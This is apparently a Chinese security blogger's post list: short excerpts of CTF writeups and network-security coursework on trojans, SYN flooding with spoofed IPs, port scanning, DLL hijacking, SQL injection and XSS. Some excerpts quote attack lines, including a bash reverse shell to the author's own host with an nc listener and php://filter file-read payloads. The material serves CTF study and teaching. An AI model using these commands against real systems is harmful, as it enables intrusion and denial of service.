- 博客(41)
- 收藏
- 关注
RSS订阅原创 SCUCTF2020部分writeup
SCUCTF2020部分writeupMISC专 业 团 队binwalk -e Daning.png提取出word文档scuctf{19cc63ff-50b9-4254-a997-89d613290918}记录flag{b80e3ba4-055f-4c26-9482-23dc46424852}APU的犯罪证据上传的shell<?phpsession_start();function fastpow($a,$b,$c){ if($b==0) ret
2020-06-21 22:55:10
1134
原创 局域网内通过mac地址获取ip地址
局域网内通过mac地址获取ip地址通过dhcp通过arp等方法建立ip到Mac的映射,再反向查找RARP(逆地址解析协议)
2020-05-25 13:38:36
2681
原创 Windows+vm双机调试内核
参考链接编写通用 Hello World 驱动程序 (KMDF) - Windows drivers | Microsoft Docshttps://docs.microsoft.com/zh-cn/windows-hardware/drivers/gettingstarted/writing-a-very-small-kmdf–driver调试环境通常,在测试和调试驱动程序时,调试程序和...
2019-12-30 14:19:51
378
原创 强化学习
参考链接天津包子馅儿 - 知乎https://www.zhihu.com/people/guoxiansia/posts?page=3Gymhttp://gym.openai.com/
2019-12-19 15:50:42
118
原创 keras自定义评价函数后load_model出错
评价函数和 损失函数 相似,只不过评价函数的结果不会用于训练过程中。#自定义评价函数def my_metrics(y_true, y_pred): predict = tf.reshape(y_pred, [-1, word_len, word_class]) max_idx_p = tf.argmax(predict, 2) max_idx_l = tf.argmax...
2019-12-17 15:59:05
880
原创 编写基于PAM认证的应用程序
要求课堂实验:在教师讲解的基础上,阅读教师给出的参考文献编写一个程序,要求为:1)使用Linux下的用户名及其密码实现对该程序的认证;(提示:只需完成应用程序的编写与认证策略的设定)2)该用户认证完成后,重新设置改用户的密码参考文献: http://www.linux-pam.org代码/etc/pam.d/check_user#check authorizationauth ...
2019-12-09 15:01:14
374
原创 分析ftp协议,获得用户名和密码
要求阅读与理解libnids 给出的例子程序sniff和printall(在sample目录),在此基础上,修改printall程序:1、在TCP进入其状态时,打印对应的状态信息;2、过滤登录信息,得到登录的用户名和密码;3、判断登录密码是否正确步骤安装libpcap、libnet与libnids安装glib-2在http://ftp.gnome.org/pub/gnome...
2019-12-02 19:53:42
1670
原创 C语言windows程序设计
创建一个Win32 Application项目参考链接:随笔列表第3页 - wid - 博客园https://www.cnblogs.com/mr-wid/default.html?page=3
2019-12-01 16:32:27
541
原创 windows下分析恶意代码工具列表
windows工具尽量从官网下载工具工具火绒剑使用Resource Hacker来查看资源节PEID查壳,KANAL插件用来从PE文件中找出普遍使用的加密算法ASPack 壳,可用AspackDie脱之yoda’s Protector 脱壳机:stanko_popov@abv.bgUPX加壳与脱壳Resource HackerWindows®应用程序的免费资源编译器和反编译器...
2019-11-29 09:19:16
930
原创 木马隐藏A+B
要求把加密后的b.dll放到a里面提取加密部分的数据解密执行解密后的数据1.木马自启动【必做】2.木马功能文件【必做】screen dump(截屏)【必做】command shell【必做】keylog(键盘记录)【选做】3.木马抗查杀【选做】4.木马隐藏文件【必做】进程【必做】端口【选做】启动盘【选做】代码自启动通过设置注册表,在开机的时候自启动#in...
2019-11-25 22:18:18
987
1
原创 入侵检测系统snort
要求snort 的安装与配置自己设计snort 规则发现入侵企图:1、入侵http服务或者ftp服务的入侵企图;2、使用icmp协议的探测企图。实验步骤安装相应软件test.conf注意规则之间要有空格var HOME_NET 192.168.59.110log tcp any any -> $HOME_NET any (msg:"log tcp"; sid:10...
2019-11-25 15:22:10
579
原创 原始套接字
要求利用原始套接字实现一个TCP SYN flooding 程序:要求:客户端不断向攻击端发送SYN连接请求;客户端在发送数据时,通过源地址随机地址的方式隐藏自己的IP地址;检验: 在shell下通过“netstat -tn”检查syn_recv连接数检验自己的程序是否成功代码代码好像有点问题。不能伪造MAC地址。#include <stdio.h>#inclu...
2019-11-18 15:53:57
391
原创 利用netfilter构建用户级防火墙
要求设置iptables过滤规则为:所有从本机发出的icmp包全部到自己编写的应用程序编写应用程序,功能如下:·2.1 允许从本机出发,目的地址为win ip的icmp包;·2.2 丢弃其他任何icmp包;·2.3 当出现错误时,做错误处理,能够清理占用资源,退出程序。实验环境red hat 9.0步骤下载iptables-1.2.7a.tar.bz2.rar到red ha...
2019-11-18 15:42:48
677
原创 Detours:下载及编译
下载链接:GitHub - microsoft/Detours: Detours is a software package for monitoring and instrumenting API calls on Windows. It is distributed in source code form.https://github.com/microsoft/Detours微软的Det...
2019-11-16 14:55:41
2977
原创 windows获取system权限
参考链接Windows获取System权限 - 简书https://www.jianshu.com/p/1e48b3a24e31具体步骤下载链接:PsExec - Windows Sysinternals | Microsoft Docshttps://docs.microsoft.com/en-gb/sysinternals/downloads/psexec以管理员身份启动cmd,使...
2019-11-14 21:42:37
2183
原创 DLL加载顺序劫持
这里写自定义目录标题欢迎使用Markdown编辑器欢迎使用Markdown编辑器你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。...
2019-11-13 17:36:17
297
原创 U盘制作kali持久启动盘+文件存储
准备材料硬件U盘一个,最好使用USB3.0的U盘,速度比较快。可能用到的软件DiskgeniusWindows下给磁盘分区的软件,免费版功能就够用了一个Linux系统会用到Linux系统下的dd命令和其他相关命令一个kali的iso镜像win32Disk参考链接Kali Linux Live | Kali Docshttps://docs.kali....
2019-11-06 10:40:46
3344
原创 编写脚本iptest.sh/iptest2.sh,防火墙功能
内容1、设置iptables过滤规则为:所有从本机发出的icmp包全部到自己编写的应用程序2、编写应用程序,功能如下:1)允许从本机出发,目的地址为win ip的icmp包;2)丢弃其他任何icmp包;3)当出现错误时,做错误处理,能够清理占用资源,退出程序。...
2019-10-28 17:02:08
690
原创 使用Libpcap库捕获局域网中的IP包
要求内容使用Libpcap库捕获局域网中的IP包,要求:1、打印数据包的源与目的物理地址;2、打印源IP与目的IP地址;3、打印出上层协议类型;4、如果上层协议为TCP或UDP协议,打印目的与源端口信息;5、如果上层协议为TCP或UDP协议,将数据以16进制与ASCII的两种方式同时打印出来,不可打印字符以‘.’代替;00000 47 45 54 20 2f 20 48 54 ...
2019-10-27 19:10:38
1149
原创 利用select函数实现聊天室程序
要求利用select函数实现在Linux环境下实现一个聊天室程序,要求:用户默认处于广播模式,一个客户在其客户端发送的消息,其它客户端用户全部可以收到;程序支持下列命令/help:显示帮助信息(思考:信息是放在客户端还是服务器端);/quit:用户退出聊天室,同时将退出信息广播给其他用户;/who:显示在线用户;/send 用户名 消息:向指定用户发送点到点消息程序退出时清理所有...
2019-10-24 22:41:44
934
原创 通过注册表改变Windows下WLAN的Mac地址
参考链接3种方法来在Windows中变更电脑的Mac地址https://zh.wikihow.com/在Windows中变更电脑的Mac地址Registry Functions - Windows applications | Microsoft Docshttps://docs.microsoft.com/zh-cn/windows/win32/sysinfo/registry-fun...
2019-10-24 21:56:23
728
原创 多线程端口扫描程序
要求实现一个多线程端口扫描程序:要求:1、能至少扫描5个IP地址;2、针对每个iP地址,开设100个线程同时对其进行扫描;3、如果端口打开,使用函数getservbyport获取其服务名,在屏幕上打印:IP port servername,如果是未知服务,则屏幕显示:ip port unkonown注意点注意各种参数传递的类型arg是一个地址,将arg地址复制到&po...
2019-10-12 15:45:14
1416
原创 TCP公开扫描程序
要求利用socket中的sock_stream套接字实现一个TCP公开扫描程序,要求:输入用户通过程序可以设定扫描的目的地址;用户可以设定扫描端口的范围;输出显示被扫描目标开启了那些端口;程序的验证:在shell下输入命令“netstat -lnt”,对比自己程序的输出结果...
2019-09-16 09:03:21
399
原创 CTF之re
linux库函数劫持技术 - 程序园http://www.voidcn.com/article/p-sinxjpki-pz.html
2019-09-15 15:17:35
235
原创 TCP实现远程控制系统
这里写自定义目录标题要求注意点代码要求利用流套接字实现一个简单的远程控制系统:客户端输入“quit”,客户端程序与服务器端程序打印退出信息,终止程序的执行;客户输入命令,客户端将命令通过流套接字发送给服务端,服务器执行收到的命令,并将结果发送到客户端显示;如果没有客户输入的命令,服务器发送命令非法信息,并在客户端显示该条信息;服务器端可以接收客户端多次连接,能够处理客户端非正常退出。...
2019-09-09 17:00:05
1582
原创 采用UDP协议实现相同功能的程序
要求客户端要求:客户端可多次向服务器发送数据;客户端能够接收服务器端发送数据,并回显正确;服务器端要求:运行端口可配置将客户端发送来的消息正确显示,并将该消息发送给客户端;支持多个客户端同时发送代码udpserver.c#include<stdlib.h>#include<stdio.h>#include<sys/socket.h>#i...
2019-09-08 23:04:11
352
转载 CTF之代码审计
知识点PHP弱类型比较PHP伪协议file=php://filter/read=convert.base64-encode/resource=flag.phpfile=php://filter/convert.base64-encode/resource=flag.php(过滤了操作名read 的绕过方法)file=php://filter/write=convert.base64-d...
2019-07-25 20:48:18
493
原创 CTF之XSS漏洞
练习平台XSS Challenges (by yamagata21) - Stage #1http://xss-quiz.int21h.jp/alert(1)https://xss.haozi.me/#/0x00alert(1) to winhttps://alf.nu/alert1
2019-07-25 20:41:36
3665
1
原创 CTF之文件上传
练习平台GitHub - c0ny1/upload-labs: 一个想帮你总结所有类型的上传漏洞的靶场https://github.com/c0ny1/upload-labs参考链接Upload-labs文件上传(11-19) - tdcoming’blog QQ group 906755997 - CSDN博客https://blog.csdn.net/qq_29647709/...
2019-07-25 20:33:04
788
原创 CTF之SQL注入
练习平台GitHub - Audi-1/sqli-labs: SQLI labshttps://github.com/Audi-1/sqli-labs一般步骤及注入模板爆库名SELECT database()爆表名select group_concat(table_name) from information_schema.tables where table_schema=d...
2019-07-25 20:26:19
215
原创 CTF之PWN
所需工具工欲善其事,必先利其器。IDAWindows下逆向分析工具。GDBLinux下逆向分析工具。Python中的pwntools库参考资料《程序员的自我修养——链接、装载与库》,俞甲子、石凡、潘爱民 著...
2019-07-25 20:14:16
588
原创 CTF概述
不定时更新······练习平台X计划平台https://www.linkedbyx.com/taskCenter/latest每月有月赛,可以适应CTF比赛时紧张的节奏。攻防世界https://adworld.xctf.org.cn/题目比较全面,可以用来日常练习。学习资料Getting Started - CTF Wikihttps://ctf-wiki.gith...
2019-07-25 20:08:47
356
原创 2019SCUCTF部分题解
writeup2019SCUCTF部分题解赛前通知解题思路flagweb来了老弟解题思路flag你好呀解题思路参考链接:flag简单的XSS解题思路参考链接flag稍难一点的XSS解题思路参考链接flagreshowme666解题思路参考链接flagpwnbabystack解题思路flaglogin解题思路flagMISC流量分析解题思路参考链接flagstream解题思路flag婉姐姐的内存镜像...
2019-05-20 21:07:04
1167
原创 python识别验证码之分离图片验证码颜色通道
代码如下:import requestsfrom PIL import Imageimport pytesseractimport reurl3='获取验证码链接'for i in range(0,10): r = requests.get(url3) #保存验证码图片 with open(str(i)+'.bmp', 'wb') as f: for c...
2019-04-21 14:59:54
1501
原创 2018 SCUCTF web题:cat?非常规题解
主要思路1.寻找可以写入的目录2.通过 > 构造文件名,在通过 ls -th>g 将命令写入文件3.通过bash -i >& /dev/tcp/你的公网ip/监听的端口 0>&1构造反弹shell4.在服务器使用 "nc -lnvp 相应端口"python脚本如下# -*- coding: utf8 -*-import requestsim...
2018-12-19 21:32:57
1844
原创 NJUPT CTF 2018 ——web:easy_audit
easy_audit这是我在本地搭的php环境里的,把die()里的输出改了,便于查找错误<?phphighlight_file(__FILE__);error_reporting(0);if($_REQUEST){ foreach ($_REQUEST as $key => $value) { if(preg_match('/[a-zA-Z]/i'...
2018-11-30 17:33:14
1377
原创 2018极客大挑战-not reverse
欢迎使用Markdown编辑器你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。学好数学很重要学好数学很重要学好数学很重要我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客:...
2018-11-30 17:05:09
485
原创 Bugku--乌云邀请码
下载下来的压缩包解压后是一张图片用 Stegsolve查看图片的每个颜色通道,发现三原色的0位的左上角有点奇怪,应该是LSB隐写打开Stegsolve-&gt;Analyse-&gt;Data Extract,选取相应颜色通道更改Bit Plane Order,就得到flag了顺便总结一下图片隐写常用套路1、能打开的先用stegsolve看一下各个颜色通道有没有隐藏信息,或者是不...
2018-10-20 17:17:26
5016
2
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人